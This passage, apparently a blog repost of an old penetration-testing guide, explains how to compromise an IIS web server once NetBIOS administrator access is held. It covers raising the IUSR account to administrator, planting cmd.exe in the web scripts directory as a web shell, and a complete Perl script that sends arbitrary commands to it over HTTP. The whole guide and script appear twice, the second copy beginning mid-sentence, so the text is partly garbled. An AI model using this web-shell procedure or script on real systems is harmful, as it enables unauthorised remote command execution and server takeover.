In this situation, let us assume that port 80 is open but no exploitable
scripts or weaknesses are to be found, but that we have administrator right
via NetBIOS. Uploading a program is trivial - we use NetBIOS. A simple way
to execute a program is to use the NT remote user administration tool and to
elevate the IUSR_machineuser to administrator level. The next step is to
make a copy of cmd.exein the <webroot>../scripts directory and then simply
calling cmd.exewith parameters from a browser. An easy way of doing this
via command line is by using the following PERL script:
#!/usr/bin/perl
use Socket;
if ($#ARGV<1) {die "Usage: execute IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$command=@ARGV[1];
print "Executing $command on $host:$port\n";
$command=~s/ /\%20/g;
$target = inet_aton($host);
# ---------------send the command
my @results=sendraw("GET /scripts/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
This script simply executes commands found in the second parameter using the
copied cmd.exe in the scripts directory. With the IUSR_machineuser elevated
to administrator rights, all commands can be executed.
scripts or weaknesses are to be found, but that we have administrator right
via NetBIOS. Uploading a program is trivial - we use NetBIOS. A simple way
to execute a program is to use the NT remote user administration tool and to
elevate the IUSR_machineuser to administrator level. The next step is to
make a copy of cmd.exein the <webroot>../scripts directory and then simply
calling cmd.exewith parameters from a browser. An easy way of doing this
via command line is by using the following PERL script:
#!/usr/bin/perl
use Socket;
if ($#ARGV<1) {die "Usage: execute IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$command=@ARGV[1];
print "Executing $command on $host:$port\n";
$command=~s/ /\%20/g;
$target = inet_aton($host);
# ---------------send the command
my @results=sendraw("GET /scripts/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
This script simply executes commands found in the second parameter using the
copied cmd.exe in the scripts directory. With the IUSR_machineuser elevated
to administrator rights, all commands can be executed.
No comments:
Post a Comment